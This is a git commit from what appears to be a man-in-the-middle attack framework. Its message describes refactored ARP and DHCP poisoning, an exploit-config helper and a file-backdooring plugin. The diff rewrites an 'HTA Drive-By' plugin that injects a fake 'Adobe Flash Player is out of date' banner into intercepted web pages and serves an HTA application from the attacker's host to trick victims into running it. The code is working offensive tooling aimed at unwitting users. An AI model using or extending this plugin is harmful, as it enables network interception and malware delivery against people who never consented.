This commit refactors ARP and DHCP poisoning:

DHCP poisoning now works on Windows, additionaly it's been optimized for performance improvements ARP poisoning has been optimized with and internal cache and some algo improvements cve-details-parser.py has been added to the utils/ directory to help adding exploits to the BrowserSniper config file I'm currently working on adding to the filepwn plugin all of the missing options that bdfproxy stand-alone has
2025-07-08 05:51:48 -07:00 · 2015-07-25 02:49:41 +02:00 · 2015-07-25 02:49:41 +02:00 · ba14ed8687
commit ba14ed8687
parent 5e2f30fb89
35 changed files with 1082 additions and 676 deletions
--- a/plugins/htadriveby.py
+++ b/plugins/htadriveby.py
@ -21,36 +21,36 @@ import flask

 from plugins.plugin import Plugin
 from plugins.inject import Inject
-from core.servers.http.HTTPserver import HTTPserver

 class HTADriveBy(Inject, Plugin):
-	name = 'HTA Drive-By'
-	desc = 'Performs HTA drive-by attacks on clients'
-	optname = 'hta'
-	ver = '0.1'
+    name = 'HTA Drive-By'
+    desc = 'Performs HTA drive-by attacks on clients'
+    optname = 'hta'
+    ver = '0.1'

-	def initialize(self, options):
-		self.bar_text = options.text
-		self.ip = options.ip
-		Inject.initialize(self, options)
-		self.html_payload = self.get_payload()
+    def initialize(self, options):
+        self.bar_text = options.text
+        self.ip = options.ip
+        Inject.initialize(self, options)
+        self.html_payload = self.get_payload()

-		server = HTTPserver().server
+        from core.servers.http.HTTPserver import HTTPserver
+        def hta_request(path):
+            if path == options.hta_app.split('/')[-1]:
+                with open(options.hta_app) as hta_file:
+                    resp = flask.Response(hta_file.read())

-		@server.route('/<hta_req>')
-		def client_request(hta_req):
-			if hta_req == "Flash.hta":
-				with open('./config/hta_driveby/Flash.hta') as hta_file:
-					resp = flask.Response(hta_file.read())
+                resp.headers['Content-Type'] = "application/hta"
+                return resp

-				resp.headers['Content-Type'] = "application/hta"
-				return resp
+        HTTPserver().add_endpoint(hta_request)

-	def get_payload(self):
-		with open("./core/html/htadriveby.html", 'r') as file:
-			payload = re.sub("_TEXT_GOES_HERE_", self.bar_text, file.read())
-			payload = re.sub("_IP_GOES_HERE_", self.ip, payload)
-		return payload
+    def get_payload(self):
+        with open("./core/html/htadriveby.html", 'r') as file:
+            payload = re.sub("_TEXT_GOES_HERE_", self.bar_text, file.read())
+            payload = re.sub("_IP_GOES_HERE_", self.ip, payload)
+        return payload

-	def options(self, options):
-		options.add_argument('--text', type=str, default='The Adobe Flash Player plug-in was blocked because it is out of date.', help="Text to display on notification bar")
+    def options(self, options):
+        options.add_argument('--text', type=str, default='The Adobe Flash Player plug-in was blocked because it is out of date.', help="Text to display on notification bar")
+        options.add_argument('--hta-app', type=str, default='./config/hta_driveby/Flash.hta', help='Path to HTA application [defaults to config/hta_driveby/Flash.hta]')